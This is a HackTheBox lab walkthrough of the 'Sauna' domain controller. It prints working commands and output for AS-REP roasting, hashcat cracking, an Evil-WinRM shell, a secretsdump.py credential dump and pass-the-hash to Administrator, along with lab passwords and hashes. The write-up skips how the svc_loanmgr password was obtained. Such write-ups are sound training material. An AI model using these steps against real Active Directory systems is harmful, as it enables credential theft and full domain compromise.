HackTheBox - Sauna Walkthrough
8 min read

HackTheBox - Sauna Walkthrough

Sauna focused on Active Directory enumeration and the use of AS-REP roasting to recover a crack-able user hash. Other hashes were able to be dumped from the NTDS.DIT file and used in a pass-the-hash authentication to achieve Administrator access.

Introduction

https://www.hackthebox.eu/storage/avatars/f31d5d0264fadc267e7f38a9d7729d14.png

OS: Windows

Difficulty: Easy

Points: 20

Release: 15 Feb 2020

IP: 10.10.10.175

Profile Link


Tools:

Recon

We start off with a basic nmap scan of the top 1000 ports, plus service and OS discovery.

nmap -A -sC -sV 10.10.10.175

Starting Nmap 7.80 ( <https://nmap.org> ) at 2020-06-25 21:04 CDT
Nmap scan report for 10.10.10.175
Host is up (0.069s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION

53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind

80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-26 09:08:53Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port53-TCP:V=7.80%I=7%D=6/25%Time=5EF557A8%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\\0\\x1e\\0\\x06\\x81\\x04\\0\\x01\\0\\0\\0\\0\\0\\0\\x07version\\
SF:x04bind\\0\\0\\x10\\0\\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h04m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-26T09:11:12
|_  start_date: N/A
                                                                                                                                                                                                                                           
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .                                                                                                                                             
Nmap done: 1 IP address (1 host up) scanned in 308.46 seconds

Quick Observations

  • We immediately confirm that this is a Windows machine and very likely a Domain Controller due to the Kerberos server on TCP/88 and LDAP on TCP/389.
  • We have a domain name: EGOTISTICAL-BANK
  • We can see that SMB has message signing enforced so this won't be vulnerable to pass-the-hash / relay attacks.

Website Enumeration

  • There is a website on TCP/80 with the title "Egotistical Bank".

There is a teams page on the website that contains several full names. I decided to create a list of possible usernames from these names based on common sysadmin naming schemes:

fergus
fsmith
ferguss
fergus.smith
hugo
hbear
hugob
hugo.bear
skerb
steven
stevenk
steven.kerb
scoins
shaunc
shaun
shaun.coins
btaylor
bowiet
bowie
bowie.taylor
sdriver
sophied
sophie.driver
sophie

Nothing of interest was found in a quick gobuster scan: gobuster dir -u <http://10.10.10.175/> -w /usr/share/wordlists/dirb/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            <http://10.10.10.175/>
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/26 09:51:14 Starting gobuster
===============================================================
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/Images (Status: 301)
/index.html (Status: 200)
===============================================================
2020/06/26 09:51:42 Finished
===============================================================

Note: It's also possible to use tools such as kerbrute to build a user list instead of what I've done manually above!

Active Directory Enumeration

I started searching around for information about Kerberos pre-auth attacks, and found this excellent video explaining GetNPUsers.py

Host file entries were created to make the use of tooling easier

/etc/hosts

# HTB
10.10.10.175 EGOTISTICALBANK
10.10.10.175 EGOTISTICAL-BANK.LOCAL

You can just run [GetNPUsers.py](<http://getnpusers.py>) with the -dc-ip argument to bypass the need for local resolution. This is just a habit of mine that simplifies attacks going forward.

AS-REP roasting attack was attempted using GetNPUsers.py

AS-REP Roasting

The file ad_usernames.txt was the compilation of usernames extracted from the teams page on the website.

GetNPUsers.py EGOTISTICALBANK/ -usersfile ad_usernames.txt -format hashcat -outputfile hashes.asreproast

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...

**$ ls**
ad_usernames.txt  hashes.asreproast 
**$ cat hashes.asreproast**
[email protected]:4b9d4497a7d50fe6d990476dc2af2dee$9f6c5c277b367323331d15f542dac8206cfe6f81731389c5984e6d515cba3f8ae120ae50a6e75ba330edb36bfe5341a7cf8616bd18148de31700162b45a1ae12f6cb448075f8d1b6d1f6448309de26d5c4072d9e68879fb97fdfd5b3421e55b2c433ff41730f46cecadad13dcc78c4bf6950db0101a5eda5584b6a84574732d6b346c1d87257af1209a803c11366ec7f28219309597b984c4c409ebaf465f98a2519ce466b5484a9c4a8391b89bb55a05a1187ee26ccabde0012485f0282a126cbfb5aff3ec817f2c93616369f2837567e3d85c50f650f13c96f55834491b88731888e4fbdf5f38d6bbb1909413495c3c894418263b28db885

Cracking the hash for user fsmith using hashcat

Hash for user: fsmith

[email protected]:4b9d4497a7d50fe6d990476dc2af2dee$9f6c5c277b367323331d15f542dac8206cfe6f81731389c5984e6d515cba3f8ae120ae50a6e75ba330edb36bfe5341a7cf8616bd18148de31700162b45a1ae12f6cb448075f8d1b6d1f6448309de26d5c4072d9e68879fb97fdfd5b3421e55b2c433ff41730f46cecadad13dcc78c4bf6950db0101a5eda5584b6a84574732d6b346c1d87257af1209a803c11366ec7f28219309597b984c4c409ebaf465f98a2519ce466b5484a9c4a8391b89bb55a05a1187ee26ccabde0012485f0282a126cbfb5aff3ec817f2c93616369f2837567e3d85c50f650f13c96f55834491b88731888e4fbdf5f38d6bbb1909413495c3c894418263b28db885

hashcat.exe -m18200 "[email protected]:4b9d4497a7d50fe6d990476dc2af2dee$9f6c5c277b367323331d15f542dac8206cfe6f81731389c5984e6d515cba3f8ae120ae50a6e75ba330edb36bfe5341a7cf8616bd18148de31700162b45a1ae12f6cb448075f8d1b6d1f6448309de26d5c4072d9e68879fb97fdfd5b3421e55b2c433ff41730f46cecadad13dcc78c4bf6950db0101a5eda5584b6a84574732d6b346c1d87257af1209a803c11366ec7f28219309597b984c4c409ebaf465f98a2519ce466b5484a9c4a8391b89bb55a05a1187ee26ccabde0012485f0282a126cbfb5aff3ec817f2c93616369f2837567e3d85c50f650f13c96f55834491b88731888e4fbdf5f38d6bbb1909413495c3c894418263b28db885" -a 0 rockyou.txt

hashcat (v6.0.0) starting...

* Device #1: CUDA SDK Toolkit installation NOT detected.
             CUDA SDK Toolkit installation required for proper device support and utilization
             Falling back to OpenCL Runtime

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: <https://hashcat.net/q/timeoutpatch>
OpenCL API (OpenCL 1.2 CUDA 11.0.140) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: GeForce RTX 2080, 5696/8192 MB (2048 MB allocatable), 46MCU

[..]

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344394
* Bytes.....: 139921525
* Keyspace..: 14344387
* Runtime...: 1 sec

[email protected]:4b9d4497a7d50fe6d990476dc2af2dee$9f6c5c277b367323331d15f542dac8206cfe6f81731389c5984e6d515cba3f8ae120ae50a6e75ba330edb36bfe5341a7cf8616bd18148de31700162b45a1ae12f6cb448075f8d1b6d1f6448309de26d5c4072d9e68879fb97fdfd5b3421e55b2c433ff41730f46cecadad13dcc78c4bf6950db0101a5eda5584b6a84574732d6b346c1d87257af1209a803c11366ec7f28219309597b984c4c409ebaf465f98a2519ce466b5484a9c4a8391b89bb55a05a1187ee26ccabde0012485f0282a126cbfb5aff3ec817f2c93616369f2837567e3d85c50f650f13c96f55834491b88731888e4fbdf5f38d6bbb1909413495c3c894418263b28db885:**Thestrokes23**

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: [email protected]:4b9d4497a7d50f...8db885
Time.Started.....: Fri Jun 26 10:52:16 2020 (1 sec)
Time.Estimated...: Fri Jun 26 10:52:17 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 10760.2 kH/s (5.51ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10551296/14344387 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 9797632/14344387 (68.30%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: bamm24 -> TUGGAB8
Hardware.Mon.#1..: Temp: 57c Fan:  5% Util: 19% Core:1935MHz Mem:7000MHz Bus:16

Started: Fri Jun 26 10:52:06 2020
Stopped: Fri Jun 26 10:52:19 2020

SMB Enumeration

(This was a dead-end)

Now that we have a credential for user fsmith, let's investigate SMB.

smbmap -u fsmith -p Thestrokes23 -d EGOTISTICALBANK -H 10.10.10.175

  • We lack permissions to get any files on SMB.
  • PsExec/WMI over SMB doesn't seem to work. 😢
[+] IP: 10.10.10.175:445        Name: EGOTISTICALBANK                                   
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        RICOH Aficio SP 8300DN PCL 6                            NO ACCESS       We cant print money
        SYSVOL                                                  READ ONLY       Logon server share

Exploitation

Acquiring a user shell with Evil-WinRM

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\\Users\\FSmith\\Documents> ls
*Evil-WinRM* PS C:\\Users\\FSmith\\Documents> cd ..\\Desktop
*Evil-WinRM* PS C:\\Users\\FSmith\\Desktop> ls

    Directory: C:\\Users\\FSmith\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt

Enumerating other users on the machine

Directory: C:\\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/25/2020   1:05 PM                Administrator
d-----        1/23/2020   9:52 AM                FSmith
d-r---        1/22/2020   9:32 PM                Public
d-----        1/24/2020   4:05 PM                svc_loanmgr

Privilege Escalation

At this point I usually run winPEAS or a similar script to start looking for privilege escalation. For this particular box with a strong focus on AD, I wanted to use [secretsdump.py](<http://secretsdump.py>) (another script in the impacket suite) to dump the hashes from the NTDS.DIT file, using the DRUSAPI method (Directory Replication Service API).

secretsdump.py EGOTISTICALBANK/svc_loanmgr:Moneymakestheworldgoround\\[email protected]


Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:1678e6d4d0797087aa622ac4a5f11f4b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:c6a5b80d2ab44c629a90bb0246bf4521afbaec4cefe930fe2623ecba55d9349f
SAUNA$:aes128-cts-hmac-sha1-96:5bd1f2bd156d1fbed58a3955ff9c4b34
SAUNA$:des-cbc-md5:2f29ced334b05e7c
[*] Cleaning up...

We recovered a NTLM hash for the Administrator user!

  • Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
  • We know that the hash to crack is the 4th octet (delimited by :), which is d9485863c1e9e05851aa40cbb4ab9dff

I was unable to crack this password using hashcat and the rockyou.txt wordlist (hashcat.exe -m1000 -a 0 "d9485863c1e9e05851aa40cbb4ab9dff" rockyou.txt)

Fortunately for us, Evil-WinRM allows us to authenticate using pass-the-hash. Below is a good video on the subject of NTLM PtH.

Pass the Hash, Part III: How NTLM Will Get You Hacked
The most important takeaway about PtH is that the password hashes that are stored in memory (and grabbed by hackers) are a feature of Single Sign On.

Administrator shell is one command away now: evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff


Summary

  1. Enumerating the website's teams page provided us with a list of full names that we could deduce possible usernames from (e.g. "Frank Smith" ⇒ "fsmith").
  2. AS-REP roasting attack was performed using GetNPUsers.py against the domain discovered in the nmap scans EGOTISTICAL-BANK using the username list we created in step one.
  3. hashcat was used to crack the hash we recovered for the user fsmith
  4. With our new credentials, we were able to acquire a user shell using Evil-WinRM
  5. The hash for Administrator inside of NTDS.DIS were able to be dumped using [secretsdump.py](<http://secretsdump.py>) taking advantage of the Directory Replication Service API.
  6. A shell as administrator was acquired using pass-the-hash authentication with Evil-WinRM